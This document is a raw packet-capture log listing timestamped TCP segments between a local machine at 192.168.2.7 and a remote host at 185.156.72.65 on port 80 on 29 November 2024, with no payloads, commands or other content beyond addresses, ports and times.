Nov 29, 2024 19:50:37.952378035 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.952392101 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.952435017 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.953213930 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.953262091 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.953299999 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.953340054 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.954078913 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.954123974 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.954173088 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.954221964 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.954925060 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.954969883 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.955074072 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.955142975 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.955795050 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.955837965 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.955981970 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.956022024 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.956669092 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.956708908 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.956779003 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.956816912 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.957556963 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.957613945 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.957628965 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.957674026 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.958431959 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.958475113 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.958499908 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.958538055 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.959283113 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.959333897 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.959350109 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.959404945 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.960146904 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.960186958 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.960212946 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.960251093 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.961005926 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.961050987 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.961060047 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.961091995 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.961680889 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.961725950 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.961853981 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.961896896 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.962318897 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.962359905 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.962451935 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.962496996 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.963198900 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.963248968 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.963264942 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.963305950 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.964092016 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.964132071 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.063194036 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.063219070 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.063303947 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.063580990 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.063635111 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.063709021 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.063751936 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.064512968 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.064563990 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.064594030 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.064634085 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.065310001 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.065345049 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.065500021 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.065557957 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.066190958 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.066250086 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.066334009 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.066385984 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.067086935 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.067126989 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.067138910 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.067195892 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.068104982 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.068167925 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.068244934 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.068289995 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.068944931 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.068985939 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.068990946 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.069056988 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.069665909 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.069710016 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.069747925 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.070549011 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.070568085 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.070590019 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.070611000 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.071424961 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.071470022 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.071526051 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.071624994 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.072442055 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.072455883 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.072501898 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.073179960 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.073223114 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.073256016 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.073297024 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.074053049 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.074099064 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.074150085 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.074198961 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.074920893 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.074963093 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.074997902 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.075047970 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.075735092 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.075823069 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.075862885 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.076617956 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.076683044 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.076713085 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.076750040 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.077466011 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.077604055 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.077620029 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.077644110 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.078372955 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.078438044 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.078468084 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.078512907 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.079246998 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.079319954 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.079327106 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.079359055 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.080112934 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.080176115 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.080183029 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.080220938 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.080941916 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.081072092 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.081098080 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.081130981 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.081847906 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.081899881 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.081932068 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.081974030 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.082679033 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.082725048 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.142055988 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.142127991 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.142329931 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.142374992 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.142441988 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.142487049 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.142558098 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.142605066 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.143368959 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.143419981 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.143500090 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.143548965 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.144175053 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.144224882 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.144284964 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.144329071 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.145061016 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.145111084 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.145234108 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.145277977 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.145927906 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.145979881 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.145998955 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.146043062 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.146826029 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.146873951 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.146919012 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.146965027 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.147660017 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.147711992 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.147747040 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.147789001 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.148541927 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.148597002 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.148654938 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.148698092 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.149444103 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.149492979 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.149493933 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.149533987 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.150250912 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.150310993 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.150393963 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.150438070 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.151148081 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.151278019 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.151340008 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.151386023 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.152040958 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.152053118 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.152086020 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.152118921 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.152889967 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.152941942 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.153028011 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.153073072 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.153820992 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.153935909 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.153987885 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.154691935 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.154702902 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.154747963 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.155497074 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.155555010 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.155602932 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.155649900 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.156369925 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.156416893 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.156517029 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.156559944 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.157239914 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.157285929 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.157325983 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.157371998 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.158070087 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.158113003 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.158198118 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.158241987 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.158946991 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.158994913 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.159066916 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.159112930 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.159809113 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.159881115 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.159900904 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.159954071 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.160674095 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.160790920 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.160806894 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.160851002 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.161545992 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.161699057 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.161704063 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.161752939 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.162434101 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.162470102 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.162552118 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.162625074 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.163288116 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.163332939 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.163372993 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.163518906 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.164158106 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.164237976 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.164288044 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.164585114 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.164623022 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.164684057 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.164731979 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.165518045 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.165565014 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.165575981 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.165621042 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.166346073 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.166393042 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.166459084 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.166501999 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.167196989 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.167243958 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.266165972 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.266259909 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.266328096 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.266571999 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.266633034 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.266678095 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.266721010 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.267539978 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.267617941 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.267827988 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.267894030 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.267925978 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.267972946 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.268585920 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.268657923 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.268682003 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.268726110 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.269546032 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.269757032 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.269761086 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.269804955 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.270351887 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.270425081 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.270448923 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.270493984 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.271330118 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.271384954 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.271415949 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.271461964 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.272048950 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.272160053 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.272218943 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.272964954 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.273027897 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.273104906 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.273155928 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.273794889 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.273864985 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.273870945 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.273915052 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.274646044 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.274698973 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.274780989 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.275578976 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.275645018 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.275666952 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.275711060 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.276385069 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.276402950 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.276433945 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.276458025 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.277271986 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.277357101 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.277406931 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.278135061 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.278198957 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.278264999 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.278312922 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.279015064 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.279125929 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.279129982 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.279192924 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.279890060 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.279941082 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.279947996 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.280016899 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.280750990 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.280803919 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.280811071 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.280850887 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.281611919 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.281682968 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.281713963 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.281768084 CET	49700	80	192.168.2.7	185.156.72.65
